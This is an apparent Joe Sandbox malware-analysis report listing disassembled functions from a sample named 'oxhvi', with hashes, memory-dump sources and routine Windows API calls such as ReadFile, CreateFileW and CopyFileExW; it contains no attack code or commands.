                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                      • Opcode ID: 652da58bba4d420c8458d21032f04a2e195feadc5091c9d487705bac9bd065d5
                                                                                                                                                      • Instruction ID: b249d204eb5ac97e384933cab26fba684fc70f0a746d63791dc1b844cc3ba01d
                                                                                                                                                      • Opcode Fuzzy Hash: 652da58bba4d420c8458d21032f04a2e195feadc5091c9d487705bac9bd065d5
                                                                                                                                                      • Instruction Fuzzy Hash: C411E732600606BACF14BB64D80ABAD7FB5BF90711F20C83DF442AB1C1EEB49E459760
                                                                                                                                                      Function 00568792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                      • Opcode ID: 38829b5404620fc92e4271ecac1f18c986fad969fef861498453f388f49b272c
                                                                                                                                                      • Instruction ID: 33ea87dc520d2148855bcb6fae1ea8e0179845070b7ac02e7590f69c54763db7
                                                                                                                                                      • Opcode Fuzzy Hash: 38829b5404620fc92e4271ecac1f18c986fad969fef861498453f388f49b272c
                                                                                                                                                      • Instruction Fuzzy Hash: D211487190420AAFCB15DF58E9449AE7BF5FF48310F1041A9F809AB312DA31EA118BA4
                                                                                                                                                      Function 0053B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00536B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0053B0AC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 393155aedf3abf5177b2ed81f3a84c68291a6db804fb36bea375237451a4821f
                                                                                                                                                      • Instruction ID: 95860edacb1db705adba9be828b82c579d485a7dd0ab8c62f9377f48cbd46f6c
                                                                                                                                                      • Opcode Fuzzy Hash: 393155aedf3abf5177b2ed81f3a84c68291a6db804fb36bea375237451a4821f
                                                                                                                                                      • Instruction Fuzzy Hash: 66113A31200705DFE7258E15C488B67BBE9FF44354F14C82EEAAA8BA51C771A945CB60
                                                                                                                                                      Function 0055E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                                                                      • Instruction ID: 5217a1f07ec273566246854f998e0d6ff6ce13704263268045b352b78c640151
                                                                                                                                                      • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                                                                      • Instruction Fuzzy Hash: 98F0F932500A2156C6362A66DC1A76A3F69BFC2376F140B17FC65931D1EFB0990A86A1
                                                                                                                                                      Function 00563BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00556A99,?,0000015D,?,?,?,?,005585D0,000000FF,00000000,?,?), ref: 00563BE2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: 8ca051971859c65ee350494415e174ae8995558f3cbe5f52f7867d1965bd05a2
                                                                                                                                                      • Instruction ID: fc921259344a07fb10d5d162150afedb9bfdcd43b33b87d5d40f2238a21d3cd6
                                                                                                                                                      • Opcode Fuzzy Hash: 8ca051971859c65ee350494415e174ae8995558f3cbe5f52f7867d1965bd05a2
                                                                                                                                                      • Instruction Fuzzy Hash: 95E0ED312046225BE7202A6A9C28F5A3E59FF817E0F1A0122AC06D70B0EB20DE04C2E0
                                                                                                                                                      Function 005363DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7aa70d796b4b1842f663779d25329e82932f3fc59391145f8fa5e75d0c6f68c1
                                                                                                                                                      • Instruction ID: af4f649c998d6d4ad6ec87cc943a69828371474ec92cc9d65d08690160197606
                                                                                                                                                      • Opcode Fuzzy Hash: 7aa70d796b4b1842f663779d25329e82932f3fc59391145f8fa5e75d0c6f68c1
                                                                                                                                                      • Instruction Fuzzy Hash: 4BF0F271501B12DFCB349F64E494812BFE5BA1432A3248D7EE19B83620D772A844EB50
                                                                                                                                                      Function 00586A79 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                      • Opcode ID: 84f66146ea2e4c4f174f9dd55e81013bf2b925d685ac169795501b1627aff87c
                                                                                                                                                      • Instruction ID: 37441cdbe391dcdd33b2b5a0b5ff23b590ef7c1811ec934f08666dbb00849263
                                                                                                                                                      • Opcode Fuzzy Hash: 84f66146ea2e4c4f174f9dd55e81013bf2b925d685ac169795501b1627aff87c
                                                                                                                                                      • Instruction Fuzzy Hash: B1F0E571B04A419AD7206A74D819BE2BFE4BB10359F14881AD8C592181D7B154D8A762
                                                                                                                                                      Function 0056510A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 0056512C
                                                                                                                                                        • Part of subcall function 00562D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4), ref: 00562D6E
                                                                                                                                                        • Part of subcall function 00562D58: GetLastError.KERNEL32(00601DC4,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4,00601DC4), ref: 00562D80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1353095263-0
                                                                                                                                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                      • Instruction ID: 4d13f4aa37140f0f04d2f80d949efbbfc40f97ea7a7b9eb47fc962b077e7ee93
                                                                                                                                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                      • Instruction Fuzzy Hash: 85E092761507059F8721CF6CD800A82BBF4EF853607208629E8DDD7220D371E812CB40
                                                                                                                                                      Function 0053653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                      • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                                                                      • Instruction ID: 2b6574aa2fb2f4c299abf3191baceb1cd9dc9be5c9ba80a02b8b100a25ec9aba
                                                                                                                                                      • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                                                                      • Instruction Fuzzy Hash: 62F0D47240020EBBDF05DF90C945A9E7B69FB04318F208489F9199A151D376DA21EBA1
                                                                                                                                                      Function 00534154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 176396367-0
                                                                                                                                                      • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                                                                      • Instruction ID: 711825c1d6579deada08a9c0f0d3c850040b91cbc2d8e0691ea168ba4db771dd
                                                                                                                                                      • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                                                                      • Instruction Fuzzy Hash: CFD05E2274241135A669213D2D1FC7F491CDBC26A2B04143FFE02CA1A5E9444C4604A1
                                                                                                                                                      Function 0059E783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 0059E7A2
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NamePathShort_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2021730007-0
                                                                                                                                                      • Opcode ID: bb6f6bcd354a241fe63491201c460f91784186a7d46707a01fa24f05037dfc7e
                                                                                                                                                      • Instruction ID: 76b382d243128ecad4a43bcb41907c51040815ba05e069ff4bc4e204e0cebd80
                                                                                                                                                      • Opcode Fuzzy Hash: bb6f6bcd354a241fe63491201c460f91784186a7d46707a01fa24f05037dfc7e
                                                                                                                                                      • Instruction Fuzzy Hash: 10E0CD765002255BCB1192589C09FEA77EDEFC8790F044070FC09D7248DD64DD8095A0
                                                                                                                                                      Function 005339DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005339FD
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 541455249-0
                                                                                                                                                      • Opcode ID: 051635adfecbd523bdb361eced92868bcf7afacd3d15346a1aa980139d112071
                                                                                                                                                      • Instruction ID: 5c796aae1c32297517073328273357d0ccf5233ce65f3a08427de96f9baf9389
                                                                                                                                                      • Opcode Fuzzy Hash: 051635adfecbd523bdb361eced92868bcf7afacd3d15346a1aa980139d112071
                                                                                                                                                      • Instruction Fuzzy Hash: B8E0CD765002255BCB1192589C09FEA77EDEFC8790F044071FC09D7248DD64ED80D690
                                                                                                                                                      Function 0059E753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0059E76C
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FolderPath_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2987691875-0
                                                                                                                                                      • Opcode ID: 83e91d03a6fb690b5d780a89c56ccbc23a6d99b3a70a78cc536fa50ea882a43f
                                                                                                                                                      • Instruction ID: a1819e1a6d0ab710d2fd3072e9416da0688e9034c06501cae6025fcdf4c67128
                                                                                                                                                      • Opcode Fuzzy Hash: 83e91d03a6fb690b5d780a89c56ccbc23a6d99b3a70a78cc536fa50ea882a43f
                                                                                                                                                      • Instruction Fuzzy Hash: F1D05EA19003292FDF64A6749D0DDB73AACD780214F0006A078ADD3242E974ED4486B0
                                                                                                                                                      Function 0059DA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0059D9DC,?,?), ref: 0059DA72
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1304948518-0
                                                                                                                                                      • Opcode ID: 9293d5948a70cf4da219f59f3c32543f8ec58f74a49b52b54190fe62669c4ed7
                                                                                                                                                      • Instruction ID: a229bafac1d7551384a851cc00fba46384b0879f993afded132d6e7580b40c1f
                                                                                                                                                      • Opcode Fuzzy Hash: 9293d5948a70cf4da219f59f3c32543f8ec58f74a49b52b54190fe62669c4ed7
                                                                                                                                                      • Instruction Fuzzy Hash: 5DD0A7305D0208BBEF108B50CC03F9DB77CE711B45F1041A4B101EA0D0C7B5A908A724
                                                                                                                                                      Function 0057073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00570AA4,?,?,00000000,?,00570AA4,00000000,0000000C), ref: 00570757
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 61b1a0b722eb605a775f288875495243ec401caffb46437c947f1985dfb55e68
                                                                                                                                                      • Instruction ID: f4f0509493e7692e74f5a0926eb5093ef5d43a289c01921186bc6fc26b14ff93
                                                                                                                                                      • Opcode Fuzzy Hash: 61b1a0b722eb605a775f288875495243ec401caffb46437c947f1985dfb55e68
                                                                                                                                                      • Instruction Fuzzy Hash: 05D06C3200010DBFDF028F85DD06EDA3BAAFB48714F014010BE1896020C736E821EB90
                                                                                                                                                      Function 0059E9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: c2a7ec9f60edbc39beb68509e8c54ffac1a54ac6c7e9e087d54fc25bb0cdc8ab
                                                                                                                                                      • Instruction ID: 8fb641387748fd5d66b6166be704393d9de0046b41faed61867e72037d13a16f
                                                                                                                                                      • Opcode Fuzzy Hash: c2a7ec9f60edbc39beb68509e8c54ffac1a54ac6c7e9e087d54fc25bb0cdc8ab
                                                                                                                                                      • Instruction Fuzzy Hash: 3FB09238000A1029BD784A381A0A4B92B1078533A67D81BA5F4BA951E2C339988BE620
                                                                                                                                                      Function 005A6561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0059DB69: FindFirstFileW.KERNELBASE(?,?), ref: 0059DBE0
                                                                                                                                                        • Part of subcall function 0059DB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 0059DC30
                                                                                                                                                        • Part of subcall function 0059DB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 0059DC41
